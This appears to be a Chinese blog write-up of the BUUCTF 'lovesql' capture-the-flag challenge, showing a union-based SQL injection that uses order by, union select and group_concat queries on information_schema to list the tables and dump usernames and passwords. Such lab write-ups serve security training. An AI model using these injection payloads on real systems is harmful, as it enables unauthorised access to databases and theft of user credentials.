47,【5】BUUCTF web lovesql

进入靶场

可知是单引号闭合,属于字符串型注入

则后续方法与字符串型无异

使用order by 判断出字节数为3

使用union select寻找注入点时切记第一个select为空

库名geek

表名group_concat(table_name) from information_schema.tables where table_schema='geek'#

geekuser l0ve1ysq1

字段名group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#

id username password

group_concat(column_name) from information_schema.columns where table_name='geekuser'#

可知两个表字段名相同

查询字段内容

group_concat(id,username,password) from geek.l0ve1ysq1#

group_concat(id,username,password) from geek.geekuser#

得到flag

笔记

1,本题考查字符串类型的注入

2,group_concat(id,username,password) from geek.geekuser#

一次可以爆出表格所有内容

相关推荐
DokiDoki之父13 分钟前
Mybatis—入门 & (配置)SQL提示和日志输出
数据库·sql·mybatis
TDengine (老段)1 小时前
TDengine 数据函数 LN 用户手册
大数据·数据库·物联网·时序数据库·tdengine·涛思数据
机灵猫1 小时前
Redis 在订单系统中的实战应用:防重、限流与库存扣减
数据库·redis·缓存
木易2.01 小时前
从零构建RAG知识库管理系统(二)
数据库·oracle
程序新视界1 小时前
什么是MySQL JOIN查询的驱动表和被驱动表?
数据库·后端·mysql
lingggggaaaa2 小时前
小迪安全v2023学习笔记(一百三十四讲)—— Windows权限提升篇&数据库篇&MySQL&MSSQL&Oracle&自动化项目
java·数据库·windows·笔记·学习·安全·网络安全
小光学长2 小时前
基于Vue的保护动物信息管理系统r7zl6b88 (程序+源码+数据库+调试部署+开发环境)带论文文档1万字以上,文末可获取,系统界面在最后面。
前端·数据库·vue.js
一匹电信狗2 小时前
【MySQL】数据库的相关操作
linux·运维·服务器·数据库·mysql·ubuntu·小程序
TDengine (老段)4 小时前
连接 TDengine 遇到报错 “failed to connect to server, reason: Connection refused” 怎么办?
大数据·数据库·物联网·时序数据库·iot·tdengine·涛思数据
李慕婉学姐5 小时前
Springboot黄河文化科普网站5q37v(程序+源码+数据库+调试部署+开发环境)带论文文档1万字以上,文末可获取,系统界面在最后面。
数据库·spring boot·后端